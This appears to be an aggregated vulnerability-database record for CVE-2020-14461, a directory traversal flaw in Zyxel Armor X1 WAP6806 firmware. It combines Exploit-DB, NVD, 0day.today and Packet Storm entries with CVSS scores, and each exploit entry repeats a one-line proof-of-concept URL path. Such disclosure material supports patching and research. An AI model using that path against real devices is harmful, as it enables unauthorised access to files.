{"id": "EDB-ID:48669", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Zyxel Armor X1 WAP6806 - Directory Traversal", "description": "", "published": "2020-07-15T00:00:00", "modified": "2020-07-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.exploit-db.com/exploits/48669", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2020-14461"], "lastseen": "2020-07-15T14:29:26", "viewCount": 341, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-14461"]}, {"type": "zdt", "idList": ["1337DAY-ID-34686"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158428"]}], "modified": "2020-07-15T14:29:26", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2020-07-15T14:29:26", "rev": 2}, "vulnersScore": 5.8}, "sourceHref": "https://www.exploit-db.com/download/48669", "sourceData": "# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal\r\n# Date: 2020-06-19\r\n# Exploit Author: Rajivarnan R\r\n# Vendor Homepage: https://www.zyxel.com/\r\n# Software [http://www.zyxelguard.com/WAP6806.asp]\r\n# Version: [V1.00(ABAL.6)C0]\r\n# CVE: 2020-14461\r\n# Tested on: Linux Mint / Windows 10\r\n# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]\r\n\r\n# As a result of the research, one vulnerability identified. \r\n# (Directory Traversal)\r\n# Technical information is provided below step by step.\r\n\r\n# [1] - Directory Traversal Vulnerability\r\n\r\n# Vulnerable Parameter Type: GET\r\n# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]\r\n\r\n# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/\r\n<https://target/Zyxel/images/eaZy/>", "osvdbidlist": []}

{"cve": [{"lastseen": "2020-10-03T12:55:50", "description": "Zyxel Armor X1 WAP6806 1.00(ABAL.6)C0 devices allow Directory Traversal via the images/eaZy/ URI.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2020-06-22T13:15:00", "title": "CVE-2020-14461", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14461"], "modified": "2020-07-15T17:15:00", "cpe": ["cpe:/o:zyxel:wap6806_firmware:1.00\\(abal.6\\)c0"], "id": "CVE-2020-14461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14461", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:zyxel:wap6806_firmware:1.00\\(abal.6\\)c0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2020-07-19T17:58:48", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2020-07-15T00:00:00", "title": "Zyxel Armor X1 WAP6806 - Directory Traversal Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-14461"], "modified": "2020-07-15T00:00:00", "id": "1337DAY-ID-34686", "href": "https://0day.today/exploit/description/34686", "sourceData": "# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal\r\n# Exploit Author: Rajivarnan R\r\n# Vendor Homepage: https://www.zyxel.com/\r\n# Software [http://www.zyxelguard.com/WAP6806.asp]\r\n# Version: [V1.00(ABAL.6)C0]\r\n# CVE: 2020-14461\r\n# Tested on: Linux Mint / Windows 10\r\n# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]\r\n\r\n# As a result of the research, one vulnerability identified. \r\n# (Directory Traversal)\r\n# Technical information is provided below step by step.\r\n\r\n# [1] - Directory Traversal Vulnerability\r\n\r\n# Vulnerable Parameter Type: GET\r\n# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]\r\n\r\n# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/\r\n<https://target/Zyxel/images/eaZy/>\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://0day.today/exploit/34686"}], "packetstorm": [{"lastseen": "2020-07-16T09:48:55", "description": "", "published": "2020-07-15T00:00:00", "type": "packetstorm", "title": "Zyxel Armor X1 WAP6806 Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-14461"], "modified": "2020-07-15T00:00:00", "id": "PACKETSTORM:158428", "href": "https://packetstormsecurity.com/files/158428/Zyxel-Armor-X1-WAP6806-Directory-Traversal.html", "sourceData": "`# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal \n# Date: 2020-06-19 \n# Exploit Author: Rajivarnan R \n# Vendor Homepage: https://www.zyxel.com/ \n# Software [http://www.zyxelguard.com/WAP6806.asp] \n# Version: [V1.00(ABAL.6)C0] \n# CVE: 2020-14461 \n# Tested on: Linux Mint / Windows 10 \n# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD] \n \n# As a result of the research, one vulnerability identified. \n# (Directory Traversal) \n# Technical information is provided below step by step. \n \n# [1] - Directory Traversal Vulnerability \n \n# Vulnerable Parameter Type: GET \n# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/] \n \n# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/ \n<https://target/Zyxel/images/eaZy/> \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/158428/zyxelarmorx1-traversal.txt"}]}